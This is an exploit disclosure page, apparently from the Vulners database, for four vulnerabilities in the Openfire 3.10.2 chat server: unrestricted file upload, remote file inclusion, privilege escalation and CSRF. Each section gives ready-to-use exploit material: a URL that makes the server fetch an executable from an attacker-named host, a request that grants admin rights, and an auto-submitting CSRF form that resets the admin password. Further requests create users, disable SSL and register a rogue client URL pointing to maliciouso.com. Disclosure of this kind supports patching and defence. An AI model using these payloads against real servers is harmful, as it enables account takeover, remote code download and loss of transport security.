Vulners
Lucene search
Openfire 3.10.2 - Multiple Vulnerabilities
Openfire 3.10.2 - Unrestricted File Upload
Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Unrestricted File Upload
Vulnerability Details:
=====================
Application specifies Plugin files (.jar) can be uploaded directly by using
the form, however so can the following.
.exe
.php
.jsp
.py
.sh
Exploit code(s):
===============
1) choose some malicious file using the File browser
2) click 'upload plugin'
http://localhost:9090/plugin-admin.jsp
Our malicious uploaded files will be stored under /openfire/plugins
directory.
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] fileName
Affected Area(s): [+] Server
----------------------------------------------------------------------
Openfire 3.10.2 - Remote File Inclusion
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Remote File Inclusion
Vulnerability Details:
=====================
In "available-plugins.jsp" there is no validation for plugin downloads,
allowing arbitrary file downloads
from anywhere on the internet.
On line 40: all that needs to be satisfied is the paramater is not null.
boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");
If the above condition check returns true, the application downloads
whatever file you give it.
line 54:
if (downloadRequested) {
// Download and install new plugin
updateManager.downloadPlugin(url);
// Log the event
webManager.logEvent("downloaded new plugin from "+url, null);
}
Exploit code(s):
================
1) download arbitrary filez
e.g.
http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe
Our RFI will be downloaded to "openfire\plugins" directory.
----------------------------------------------------------------------
Openfire 3.10.2 - Privilege Escalation
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Privilege escalation
Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.
Exploit code(s):
===============
Become admin!
http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&[email protected]&isadmin=on
----------------------------------------------------------------------
Openfire 3.10.2 - CSRF Vulnerabilities
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
Vulnerability Details:
=====================
No CSRF tokens exists allowing us to take malicious actions against the
application.
1- change admin password.
2- add aribitrary users to the system
3- edit server settings e.g. turn off SSL.
4- Add rogue malicious clients with permit access (Allow all XMPP clients
to connect)
and more...
Exploit code(s):
===============
1) change admin password
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost:9090/user-password.jsp"
method="post">
<input type="text" name="username" value="admin" >
<input type="text" name="password" value="abc123">
<input type="text" name="passwordConfirm" value="abc123" >
<input type="password" name="update" value="Update+Password" >
</form>
2) add aribitrary users
http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&[email protected]&password=abc123&passwordConfirm=abc123&create=Create+User
3) edit server settings & turn off SSL
http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties
4) add rogue malicious clients
http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2015 00:00Current
7.1High risk
Vulners AI Score7.1